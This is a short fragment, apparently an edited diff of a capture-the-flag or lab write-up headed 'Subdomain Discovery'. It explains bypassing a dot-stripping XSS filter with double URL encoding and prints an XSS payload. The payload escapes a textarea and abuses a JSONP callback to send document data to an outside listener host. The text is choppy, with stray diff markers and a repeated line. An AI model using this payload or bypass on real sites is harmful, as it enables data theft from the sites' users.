Subdomain Discovery

 which now returns type application/javascript.

-1. The payload has been modified to stop the use of . character as it is being replaced by stop to prevent common XSS attempts, the filter can be bypassed with double URL encoding ie %252E -> %2E -> . .
+to prevent common XSS attempts, the filter can be bypassed with double URL encoding ie%252E -> %2E -> .

 </textarea> <script src="/user-list?format=jsonp&callback=window['location']['replace']('http://listener%252Eml:9447?c%3D'%2Bdocument[%27title%27]);//"></script> <textarea>